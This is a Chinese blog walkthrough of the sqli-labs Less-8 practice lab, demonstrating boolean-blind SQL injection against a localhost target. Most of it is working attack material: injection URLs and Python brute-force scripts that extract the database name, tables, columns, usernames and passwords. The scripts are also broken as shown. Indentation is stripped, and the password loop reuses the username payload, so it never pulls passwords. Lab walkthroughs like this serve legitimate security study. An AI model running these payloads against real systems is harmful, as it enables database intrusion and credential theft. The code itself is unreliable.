sqli-Labs Less-8
又是鸽了好几天没有做题了,今天想起来赶紧补上(本想保持一两天一道的速度快速做完前二十三道题,疯狂摆)
老规矩上来先测闭合类型:
http://localhost/sqli-labs/Less-8/index.php?id=1
http://localhost/sqli-labs/Less-8/index.php?id=1'
http://localhost/sqli-labs/Less-8/index.php?id=1' and 1=2 --+
单引号闭合布尔类型盲注,只有You are in…和无回显两种情况,布尔盲注那就上手去试吧
因为练习这么多关都知道数据库名字和字段了,直接给出所有语句,具体思路就是不断去更改判断条件看有无回显,直到试出正确名称,自己练题手动去多打打语句找找感觉,实操建议上脚本工具,手动跑工作量太大了
判断版本:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(version(),3)=5.7 --+
判断数据库长度:
http://localhost/sqli-labs/Less-8/index.php?id=1' and length(database())=8 --+
数据库名称:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(database(),8)='security' --+
数据库字段数:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
数据库字段:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+ (emails表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),8)='referers' --+ (referers表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),7)='uagents' --+ (uagents表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+ (users表)
users表字段数:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3 --+
users表字段:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password' --+
到了跑用户名和密码的时候我发现不能这么列了,还是得写一个脚本批量去跑数据,就去研究了一下python脚本怎么写,因为自己现学python,水平有限也是参考了诸多大佬的文章,现在将各部分代码给出
测试数据库长度:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20length(database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
for i in range(1, 20):
p =payload.format(a=i)
u = requests.get(url+p)
if str2 in u.content:
print('对比成功长度为',i)
break
获取数据库名称:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20left(database(),{Name_order})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '=', '+', '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
database_name = ''
for i in range(1, 10):
for str in list1:
p =payload.format(Name_order=i,Name=database_name+str)
u = requests.get(url+p)
if str2 in u.content:
database_name = database_name+str
print('匹配第',i,'位成功')
break
print('database name is', database_name)
获取数据库字段数:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20(select%20count(table_name) from information_schema.tables where table_schema=database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
for i in range(1, 10):
p =payload.format(a=i)
u = requests.get(url+p)
if str2 in u.content:
print('对比成功长度为',i)
break
获取数据库字段名称:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20left((select table_name from information_schema.tables where table_schema=database() limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '$', '^', '*', '(', ')', '-', '_', '=', '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ''
field_name2 = ''
field_name3 = ''
field_name4 = ''
for i in range(0, 4):
for j in range(1, 20):
if i == 0 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name1+str)
u = requests.get(url+p)
if str2 in u.content:
field_name1 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
if i == 1 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name2+str)
u = requests.get(url+p)
if str2 in u.content:
field_name2 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
if i == 2 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name3+str)
u = requests.get(url+p)
if str2 in u.content:
field_name3 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
if i == 3 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name4+str)
u = requests.get(url+p)
if str2 in u.content:
field_name4 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
print('字段1为', field_name1)
print('字段2为', field_name2)
print('字段3为', field_name3)
print('字段4为', field_name4)
获取users表字段:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20(select%20count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
for i in range(1, 10):
p =payload.format(a=i)
u = requests.get(url+p)
if str2 in u.content:
print('对比成功长度为',i)
break
获取users表字段:
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload = "and%20left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '$', '^', '*', '(', ')', '-', '_', '=', '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ''
field_name2 = ''
field_name3 = ''
for i in range(0, 3):
for j in range(1, 20):
if i == 0 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name1+str)
u = requests.get(url+p)
if str2 in u.content:
field_name1 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
if i == 1 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name2+str)
u = requests.get(url+p)
if str2 in u.content:
field_name2 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
if i == 2 :
for str in list1:
p =payload.format(Name_order=i, Name_num=j, Name=field_name3+str)
u = requests.get(url+p)
if str2 in u.content:
field_name3 += str
print('匹配第', i+1, '张表第', j, '位成功')
break
print('字段1为', field_name1)
print('字段2为', field_name2)
print('字段3为', field_name3)
三个表的字段数自己手试一试就好,比写脚本要快的多,或者直接脚本大范围去试一样的
最后就是导出username和password
import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27' #根据自己的sqli-labs路径更改url
payload1 = "and%20left((select username from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', '.']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ['', '', '', '', '', '', '', '', '', '', '', '', '']
field_name2 = ['', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(0, 13):
for j in range(1, 20):
for str in list1:
p =payload1.format(Name_order=i, Name_num=j, Name=field_name1[i]+str)
u = requests.get(url+p)
if str2 in u.content:
field_name1[i] += str
print('匹配第', i, '个字段第', j, '位成功')
print(field_name1)
break
payload2 = "and%20left((select password from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
for i in range(0, 13):
for j in range(1, 20):
for str in list1:
p = payload1.format(Name_order=i, Name_num=j, Name=field_name2[i] + str)
u = requests.get(url + p)
if str2 in u.content:
field_name2[i] += str
print('匹配第', i, '个字段第', j, '位成功')
print(field_name2)
break
print('字段username', field_name1)
print('字段password', field_name2)
扫一扫
241
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
